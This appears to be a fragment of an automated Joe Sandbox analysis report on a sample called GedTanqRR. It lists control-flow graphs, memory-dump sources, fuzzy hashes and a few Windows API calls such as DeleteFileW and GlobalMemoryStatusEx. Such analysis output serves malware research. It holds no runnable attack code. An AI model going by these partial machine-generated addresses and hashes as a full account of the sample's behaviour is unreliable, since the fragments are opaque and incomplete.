                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-3823777903
                                                                                                                    • Opcode ID: 77f49e02a96cdbb1c2697d678255c5c0259a06c04fcc2bc596173a517eeec4d4
                                                                                                                    • Instruction ID: e75b5c516ddcfbd48169c6dea0ad075f398915ea5a6079fd6de2c81283bdfb76
                                                                                                                    • Opcode Fuzzy Hash: 77f49e02a96cdbb1c2697d678255c5c0259a06c04fcc2bc596173a517eeec4d4
                                                                                                                    • Instruction Fuzzy Hash: 83E15C71E102198FDB69FF69D8806AEB7B2FFC5305F108929E4199F348DB31D8468B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 255 6a49260-6a49285 256 6a49287-6a4928a 255->256 257 6a492b0-6a492b3 256->257 258 6a4928c-6a492ab 256->258 259 6a49b73-6a49b75 257->259 260 6a492b9-6a492ce 257->260 258->257 262 6a49b77 259->262 263 6a49b7c-6a49b7f 259->263 267 6a492e6-6a492fc 260->267 268 6a492d0-6a492d6 260->268 262->263 263->256 265 6a49b85-6a49b8f 263->265 272 6a49307-6a49309 267->272 269 6a492d8 268->269 270 6a492da-6a492dc 268->270 269->267 270->267 273 6a49321-6a49392 272->273 274 6a4930b-6a49311 272->274 285 6a49394-6a493b7 273->285 286 6a493be-6a493da 273->286 275 6a49315-6a49317 274->275 276 6a49313 274->276 275->273 276->273 285->286 291 6a49406-6a49421 286->291 292 6a493dc-6a493ff 286->292 297 6a49423-6a49445 291->297 298 6a4944c-6a49467 291->298 292->291 297->298 303 6a49492-6a4949c 298->303 304 6a49469-6a4948b 298->304 305 6a494ac-6a49526 303->305 306 6a4949e-6a494a7 303->306 304->303 312 6a49573-6a49588 305->312 313 6a49528-6a49546 305->313 306->265 312->259 317 6a49562-6a49571 313->317 318 6a49548-6a49557 313->318 317->312 317->313 318->317
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: 85960097e4273c3af88bd89d3cd9525b06379a2badc2f3a3236da8ad7b5f2731
                                                                                                                    • Instruction ID: fc3b7b88e5b4efb1400983c4051fa9370e783d27ec35880cdb1d300d35c7088a
                                                                                                                    • Opcode Fuzzy Hash: 85960097e4273c3af88bd89d3cd9525b06379a2badc2f3a3236da8ad7b5f2731
                                                                                                                    • Instruction Fuzzy Hash: 02917E31B1021A8FDB54EF65D8507AFB7F6ABC9204F108569C41DEB384EE709D428B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 321 6a4d068-6a4d083 322 6a4d085-6a4d088 321->322 323 6a4d0d1-6a4d0d4 322->323 324 6a4d08a-6a4d099 322->324 327 6a4d0d6-6a4d118 323->327 328 6a4d11d-6a4d120 323->328 325 6a4d0a8-6a4d0b4 324->325 326 6a4d09b-6a4d0a0 324->326 329 6a4da85-6a4dabe 325->329 330 6a4d0ba-6a4d0cc 325->330 326->325 327->328 331 6a4d122-6a4d124 328->331 332 6a4d12f-6a4d132 328->332 346 6a4dac0-6a4dac3 329->346 330->323 333 6a4d551 331->333 334 6a4d12a 331->334 335 6a4d134-6a4d139 332->335 336 6a4d13c-6a4d13f 332->336 341 6a4d554-6a4d560 333->341 334->332 335->336 339 6a4d141-6a4d183 336->339 340 6a4d188-6a4d18b 336->340 339->340 343 6a4d1d4-6a4d1d7 340->343 344 6a4d18d-6a4d1cf 340->344 341->324 345 6a4d566-6a4d853 341->345 348 6a4d220-6a4d223 343->348 349 6a4d1d9-6a4d21b 343->349 344->343 534 6a4d859-6a4d85f 345->534 535 6a4da7a-6a4da84 345->535 351 6a4dac5-6a4dae1 346->351 352 6a4dae6-6a4dae9 346->352 358 6a4d225-6a4d267 348->358 359 6a4d26c-6a4d26f 348->359 349->348 351->352 355 6a4db1c-6a4db1f 352->355 356 6a4daeb-6a4db17 352->356 362 6a4db21 call 6a4dbdd 355->362 363 6a4db2e-6a4db30 355->363 356->355 358->359 364 6a4d271-6a4d280 359->364 365 6a4d2b8-6a4d2bb 359->365 379 6a4db27-6a4db29 362->379 372 6a4db37-6a4db3a 363->372 373 6a4db32 363->373 375 6a4d282-6a4d287 364->375 376 6a4d28f-6a4d29b 364->376 370 6a4d2bd-6a4d2bf 365->370 371 6a4d2ca-6a4d2cd 365->371 382 6a4d2c5 370->382 383 6a4d40f-6a4d418 370->383 384 6a4d2cf-6a4d2e5 371->384 385 6a4d2ea-6a4d2ed 371->385 372->346 380 6a4db3c-6a4db4b 372->380 373->372 375->376 376->329 381 6a4d2a1-6a4d2b3 376->381 379->363 408 6a4dbb2-6a4dbc7 380->408 409 6a4db4d-6a4dbb0 call 6a466b0 380->409 381->365 382->371 389 6a4d427-6a4d433 383->389 390 6a4d41a-6a4d41f 383->390 384->385 393 6a4d336-6a4d339 385->393 394 6a4d2ef-6a4d331 385->394 398 6a4d544-6a4d549 389->398 399 6a4d439-6a4d44d 389->399 390->389 396 6a4d35c-6a4d35f 393->396 397 6a4d33b-6a4d357 393->397 394->393 396->341 406 6a4d365-6a4d368 396->406 397->396 398->333 399->333 423 6a4d453-6a4d465 399->423 414 6a4d3b1-6a4d3b4 406->414 415 6a4d36a-6a4d3ac 406->415 428 6a4dbc8 408->428 409->408 426 6a4d3b6-6a4d3f8 414->426 427 6a4d3fd-6a4d3ff 414->427 415->414 442 6a4d467-6a4d46d 423->442 443 6a4d489-6a4d48b 423->443 426->427 429 6a4d406-6a4d409 427->429 430 6a4d401 427->430 428->428 429->322 429->383 430->429 446 6a4d471-6a4d47d 442->446 447 6a4d46f 442->447 452 6a4d495-6a4d4a1 443->452 451 6a4d47f-6a4d487 446->451 447->451 451->452 461 6a4d4a3-6a4d4ad 452->461 462 6a4d4af 452->462 466 6a4d4b4-6a4d4b6 461->466 462->466 466->333 468 6a4d4bc-6a4d4d8 call 6a466b0 466->468 479 6a4d4e7-6a4d4f3 468->479 480 6a4d4da-6a4d4df 468->480 479->398 481 6a4d4f5-6a4d542 479->481 480->479 481->333 536 6a4d861-6a4d866 534->536 537 6a4d86e-6a4d877 534->537 536->537 537->329 538 6a4d87d-6a4d890 537->538 540 6a4d896-6a4d89c 538->540 541 6a4da6a-6a4da74 538->541 542 6a4d89e-6a4d8a3 540->542 543 6a4d8ab-6a4d8b4 540->543 541->534 541->535 542->543 543->329 544 6a4d8ba-6a4d8db 543->544 547 6a4d8dd-6a4d8e2 544->547 548 6a4d8ea-6a4d8f3 544->548 547->548 548->329 549 6a4d8f9-6a4d916 548->549 549->541 552 6a4d91c-6a4d922 549->552 552->329 553 6a4d928-6a4d941 552->553 555 6a4d947-6a4d96e 553->555 556 6a4da5d-6a4da64 553->556 555->329 559 6a4d974-6a4d97e 555->559 556->541 556->552 559->329 560 6a4d984-6a4d99b 559->560 562 6a4d99d-6a4d9a8 560->562 563 6a4d9aa-6a4d9c5 560->563 562->563 563->556 568 6a4d9cb-6a4d9e4 call 6a466b0 563->568 572 6a4d9e6-6a4d9eb 568->572 573 6a4d9f3-6a4d9fc 568->573 572->573 573->329 574 6a4da02-6a4da56 573->574 574->556
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q
                                                                                                                    • API String ID: 0-831282457
                                                                                                                    • Opcode ID: 08fa75c57389826ec45a6afaef6da79eb9549ecbbb36c5cbc7e683ec33aedbb2
                                                                                                                    • Instruction ID: ca34d5d03254b55bd1d3d8a45e68deee7a9185c031a5513c42634a13931bbb4c
                                                                                                                    • Opcode Fuzzy Hash: 08fa75c57389826ec45a6afaef6da79eb9549ecbbb36c5cbc7e683ec33aedbb2
                                                                                                                    • Instruction Fuzzy Hash: CA623C31A102168FCB55FB68D990A5EB7F2FF84305B208A69D4499F359DB71FC86CB80

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 582 6a44c78-6a44c9c 583 6a44c9e-6a44ca1 582->583 584 6a44cc2-6a44cc5 583->584 585 6a44ca3-6a44cbd 583->585 586 6a453a4-6a453a6 584->586 587 6a44ccb-6a44dc3 584->587 585->584 588 6a453ad-6a453b0 586->588 589 6a453a8 586->589 605 6a44e46-6a44e4d 587->605 606 6a44dc9-6a44e16 call 6a45522 587->606 588->583 591 6a453b6-6a453c3 588->591 589->588 607 6a44ed1-6a44eda 605->607 608 6a44e53-6a44ec3 605->608 619 6a44e1c-6a44e38 606->619 607->591 625 6a44ec5 608->625 626 6a44ece 608->626 622 6a44e43-6a44e44 619->622 623 6a44e3a 619->623 622->605 623->622 625->626 626->607
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fcq$XPcq$\Ocq
                                                                                                                    • API String ID: 0-3575482020
                                                                                                                    • Opcode ID: e13c052844989f6cafb6c0a407ce683458963fe90496d05b9dfa7d2153f30d4e
                                                                                                                    • Instruction ID: 81f0d52453cdd7fcee02e14b93524b8632be34b28d9488daf50598fa028e2a4c
                                                                                                                    • Opcode Fuzzy Hash: e13c052844989f6cafb6c0a407ce683458963fe90496d05b9dfa7d2153f30d4e
                                                                                                                    • Instruction Fuzzy Hash: BB618F31F102199FEB54AFA8C8557AEBBF6FBC8700F208429D109AB394DB758C458B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1384 6a49252-6a49285 1386 6a49287-6a4928a 1384->1386 1387 6a492b0-6a492b3 1386->1387 1388 6a4928c-6a492ab 1386->1388 1389 6a49b73-6a49b75 1387->1389 1390 6a492b9-6a492ce 1387->1390 1388->1387 1392 6a49b77 1389->1392 1393 6a49b7c-6a49b7f 1389->1393 1397 6a492e6-6a492fc 1390->1397 1398 6a492d0-6a492d6 1390->1398 1392->1393 1393->1386 1395 6a49b85-6a49b8f 1393->1395 1402 6a49307-6a49309 1397->1402 1399 6a492d8 1398->1399 1400 6a492da-6a492dc 1398->1400 1399->1397 1400->1397 1403 6a49321-6a49392 1402->1403 1404 6a4930b-6a49311 1402->1404 1415 6a49394-6a493b7 1403->1415 1416 6a493be-6a493da 1403->1416 1405 6a49315-6a49317 1404->1405 1406 6a49313 1404->1406 1405->1403 1406->1403 1415->1416 1421 6a49406-6a49421 1416->1421 1422 6a493dc-6a493ff 1416->1422 1427 6a49423-6a49445 1421->1427 1428 6a4944c-6a49467 1421->1428 1422->1421 1427->1428 1433 6a49492-6a4949c 1428->1433 1434 6a49469-6a4948b 1428->1434 1435 6a494ac-6a49526 1433->1435 1436 6a4949e-6a494a7 1433->1436 1434->1433 1442 6a49573-6a49588 1435->1442 1443 6a49528-6a49546 1435->1443 1436->1395 1442->1389 1447 6a49562-6a49571 1443->1447 1448 6a49548-6a49557 1443->1448 1447->1442 1447->1443 1448->1447
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: 0489b156fc8f2f6a97f22f3a678d8263aaf064a23da4189fb821371456fd1ad9
                                                                                                                    • Instruction ID: 656a2b4e5307ce777b7647ebf40486114a17ea40fa8501e08839fb9e8af3b526
                                                                                                                    • Opcode Fuzzy Hash: 0489b156fc8f2f6a97f22f3a678d8263aaf064a23da4189fb821371456fd1ad9
                                                                                                                    • Instruction Fuzzy Hash: D8515F31B102159FDB54FF64D990B6FB7FAABC9244F108469C41ADF388EA70EC428B95

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1451 6a44c69-6a44c9c 1452 6a44c9e-6a44ca1 1451->1452 1453 6a44cc2-6a44cc5 1452->1453 1454 6a44ca3-6a44cbd 1452->1454 1455 6a453a4-6a453a6 1453->1455 1456 6a44ccb-6a44dc3 1453->1456 1454->1453 1457 6a453ad-6a453b0 1455->1457 1458 6a453a8 1455->1458 1474 6a44e46-6a44e4d 1456->1474 1475 6a44dc9-6a44e16 call 6a45522 1456->1475 1457->1452 1460 6a453b6-6a453c3 1457->1460 1458->1457 1476 6a44ed1-6a44eda 1474->1476 1477 6a44e53-6a44ec3 1474->1477 1488 6a44e1c-6a44e38 1475->1488 1476->1460 1494 6a44ec5 1477->1494 1495 6a44ece 1477->1495 1491 6a44e43-6a44e44 1488->1491 1492 6a44e3a 1488->1492 1491->1474 1492->1491 1494->1495 1495->1476
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fcq$XPcq
                                                                                                                    • API String ID: 0-936005338
                                                                                                                    • Opcode ID: 4893d7cd6776bce17b57a48731ddf959b594191ef2dea4b4d060e651d80da4f9
                                                                                                                    • Instruction ID: c511b09a24cd63e94252432d6848c26c8e04c3eb548929ece5e7f691c4182364
                                                                                                                    • Opcode Fuzzy Hash: 4893d7cd6776bce17b57a48731ddf959b594191ef2dea4b4d060e651d80da4f9
                                                                                                                    • Instruction Fuzzy Hash: 1B517A71F102099FDB55AFA9C854BAEBBF6FBC8700F208529E105AF394DB748C018B95

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1678 2c3ee90-2c3eeab 1679 2c3eed5-2c3eeeb 1678->1679 1680 2c3eead-2c3eed4 1678->1680 1701 2c3eeed call 2c3ee90 1679->1701 1702 2c3eeed call 2c3ef78 1679->1702 1683 2c3eef2-2c3eef4 1684 2c3eef6-2c3eef9 1683->1684 1685 2c3eefa-2c3ef59 1683->1685 1692 2c3ef5b-2c3ef5e 1685->1692 1693 2c3ef5f-2c3efec GlobalMemoryStatusEx 1685->1693 1697 2c3eff5-2c3f01d 1693->1697 1698 2c3efee-2c3eff4 1693->1698 1698->1697 1701->1683 1702->1683
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2975480446.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_2c30000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6632224ab0280ae9fa1fb18c1c2622495fde37af79da65ab2406c7ab4feec4c9
                                                                                                                    • Instruction ID: ee05e15e0f439aa5ba1322eea3bf7bcbbc2e4b312f716f3e1dea061d31c5fb5c
                                                                                                                    • Opcode Fuzzy Hash: 6632224ab0280ae9fa1fb18c1c2622495fde37af79da65ab2406c7ab4feec4c9
                                                                                                                    • Instruction Fuzzy Hash: 8741E172E0035A9FCB14DF69D84479EFBF5AF88310F15866AE408A7641EB789845CBD0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1703 2c38038-2c3808a 1706 2c38092-2c380bd DeleteFileW 1703->1706 1707 2c3808c-2c3808f 1703->1707 1708 2c380c6-2c380ee 1706->1708 1709 2c380bf-2c380c5 1706->1709 1707->1706 1709->1708
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 02C380B0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2975480446.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_2c30000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4033686569-0
                                                                                                                    • Opcode ID: a6d64b2d91a8b2925539bdcb881ce2ad8d3b99c0b146404b05ff6b8c0e54a579
                                                                                                                    • Instruction ID: 73a2af73b10368d7bac299eaaf8a087f723c998a6d029488dffbd408d1c61179
                                                                                                                    • Opcode Fuzzy Hash: a6d64b2d91a8b2925539bdcb881ce2ad8d3b99c0b146404b05ff6b8c0e54a579
                                                                                                                    • Instruction Fuzzy Hash: 1C2127B2C006199BCB14DF9AC54569EFBB4EB48320F11862AE858B7350D779A944CFE1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1712 2c38040-2c3808a 1714 2c38092-2c380bd DeleteFileW 1712->1714 1715 2c3808c-2c3808f 1712->1715 1716 2c380c6-2c380ee 1714->1716 1717 2c380bf-2c380c5 1714->1717 1715->1714 1717->1716
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 02C380B0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2975480446.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_2c30000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4033686569-0
                                                                                                                    • Opcode ID: aa71866f6be6ae870c8fb327e3fe1a20fb0a379335bd7de728445f15e7b505c6
                                                                                                                    • Instruction ID: 4b30d1b2e300ffce0151cc6cee1cae6c4997e72be0b991bb876ca2b50cae9e8a
                                                                                                                    • Opcode Fuzzy Hash: aa71866f6be6ae870c8fb327e3fe1a20fb0a379335bd7de728445f15e7b505c6
                                                                                                                    • Instruction Fuzzy Hash: DD1136B1C006199BCB14DFAAC544A9EFBF4FF48320F11862AD818A7240D778AA44CFE1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1720 2c3ef78-2c3efec GlobalMemoryStatusEx 1722 2c3eff5-2c3f01d 1720->1722 1723 2c3efee-2c3eff4 1720->1723 1723->1722
                                                                                                                    APIs
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 02C3EFDF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2975480446.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_2c30000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1890195054-0
                                                                                                                    • Opcode ID: e7a87777884c9d017e1eab64905099d4c2ebaa96e4004fa55293dd3b1b5fc6e6
                                                                                                                    • Instruction ID: 33556ed4aa3e13d877cbb96f7a4636fa182ca0fbfde6047e75ad120ceb8d43e5
                                                                                                                    • Opcode Fuzzy Hash: e7a87777884c9d017e1eab64905099d4c2ebaa96e4004fa55293dd3b1b5fc6e6
                                                                                                                    • Instruction Fuzzy Hash: A01123B1C002599FCB10DF9AC544BDEFBF4EF48320F11816AE818A7240D778A944CFA1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH^q
                                                                                                                    • API String ID: 0-2549759414
                                                                                                                    • Opcode ID: 0e9df78ae33a69f910be1789b1f58a32df55a88eb87c4b6b70bd73274bafea51
                                                                                                                    • Instruction ID: 99123bcbfbd2b7f01e5ea6cf825a7c046d53e9367a1de35d04e1bb2cddc7c809
                                                                                                                    • Opcode Fuzzy Hash: 0e9df78ae33a69f910be1789b1f58a32df55a88eb87c4b6b70bd73274bafea51
                                                                                                                    • Instruction Fuzzy Hash: 27418F70E103199FDB55FFB5C8946AEBBB2BF86304F24492AD405EB240DB74E946CB81
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH^q
                                                                                                                    • API String ID: 0-2549759414
                                                                                                                    • Opcode ID: cc2a1a461847ec7e7bc4341353768de0b46cbed278fd984d734394d475a51426
                                                                                                                    • Instruction ID: eed0a4140634559f42933eb36750d261ffe604a54ad95a966b0d561eed92a02e
                                                                                                                    • Opcode Fuzzy Hash: cc2a1a461847ec7e7bc4341353768de0b46cbed278fd984d734394d475a51426
                                                                                                                    • Instruction Fuzzy Hash: B331DC31B102058FDB49BB74C95876E7BE2AFC9204F108868E406DF384DE35DE42CBA1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH^q
                                                                                                                    • API String ID: 0-2549759414
                                                                                                                    • Opcode ID: cf98ae4f3ffa9a45ccc2ef9d1ff5ebb710412539479b05038598b703c3f01e6f
                                                                                                                    • Instruction ID: 1221ad369fc294c90c88cffde2707109475cdb35e7cb588a3a7de0159921d87b
                                                                                                                    • Opcode Fuzzy Hash: cf98ae4f3ffa9a45ccc2ef9d1ff5ebb710412539479b05038598b703c3f01e6f
                                                                                                                    • Instruction Fuzzy Hash: 02319C31B102058FDB59BB74C85476EBAE2ABC9344F608868E406DF384DF75DE42CBA5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q
                                                                                                                    • API String ID: 0-388095546
                                                                                                                    • Opcode ID: 302726413cabd7730691647a5b787198b2e1694a257d33119f11835c0683b55e
                                                                                                                    • Instruction ID: 6ce3cf426a80504b12cc5b276404383181f0e23546fe3162daf81edf289c550c
                                                                                                                    • Opcode Fuzzy Hash: 302726413cabd7730691647a5b787198b2e1694a257d33119f11835c0683b55e
                                                                                                                    • Instruction Fuzzy Hash: 08F0DC32A102108FDF68BF58FD8066877ADEBC1395F204825C90ACF204CB29E906C751
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: \Ocq
                                                                                                                    • API String ID: 0-2995510325
                                                                                                                    • Opcode ID: 51a1c4a89cff4854bb3a5d17129768ec06f4c640322ffb4fb9df4f279bda4608
                                                                                                                    • Instruction ID: 5c32b6d857e1bc8974a9e384240ddd51dd5811bfced0f7a70bb734eedd52e132
                                                                                                                    • Opcode Fuzzy Hash: 51a1c4a89cff4854bb3a5d17129768ec06f4c640322ffb4fb9df4f279bda4608
                                                                                                                    • Instruction Fuzzy Hash: 75F0D030E54219DBDB14EF94D8997AEBBB2FF88701F204519E402A7295CB701C41CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f104e766881b7593a15f083cc0a75388d4833513f4d864c176d88b827bd72fd0
                                                                                                                    • Instruction ID: 2dcc0bce8067c69823431a87ad4a2506da0104c4492b53a31ef0b2c496c1d94c
                                                                                                                    • Opcode Fuzzy Hash: f104e766881b7593a15f083cc0a75388d4833513f4d864c176d88b827bd72fd0
                                                                                                                    • Instruction Fuzzy Hash: D1328E35B112158FDB54FB68D990BADBBB2EBC8320F108529E40ADB355DB35EC42CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1ce36ab7b2a5e5d43a9bc7e9b23512d14efa2717309c5c69bb81994fd76059a8
                                                                                                                    • Instruction ID: e7d68e2102e0b524f6ef1fd6cd0ef104102f6cc81ea2addcdba21b4af6f985c6
                                                                                                                    • Opcode Fuzzy Hash: 1ce36ab7b2a5e5d43a9bc7e9b23512d14efa2717309c5c69bb81994fd76059a8
                                                                                                                    • Instruction Fuzzy Hash: A0222A70E102098BDF64FB68D8907ADB7B2EB89315F248826E419DF395DB35DC81CB61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3cda1f9446d58935a64f1bd2623f5ed8e28f5a478f08b466aab9fe5ec1021e2d
                                                                                                                    • Instruction ID: 07b497c7717eda0197116ebef096b712846764bcbf2e8a64634da0e055a07f39
                                                                                                                    • Opcode Fuzzy Hash: 3cda1f9446d58935a64f1bd2623f5ed8e28f5a478f08b466aab9fe5ec1021e2d
                                                                                                                    • Instruction Fuzzy Hash: B661AE71F001214FCB54AB79CC8466FEAD7AFD5620B25443AE80EDB364DE65ED0287C6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: adaf06e084f208430b8355a4ed4dfe0fc40bea4110ce0db1e4a2bcdd38e62158
                                                                                                                    • Instruction ID: a868d3afe4bda323d1f28ab4715287db9e5aa2875fe66ebfa56cc5e91c2d2cbb
                                                                                                                    • Opcode Fuzzy Hash: adaf06e084f208430b8355a4ed4dfe0fc40bea4110ce0db1e4a2bcdd38e62158
                                                                                                                    • Instruction Fuzzy Hash: F3811C31B102099BDF54EFA9D95475EB7F6EBC9304F218429D40ADB394DB34EC428B51
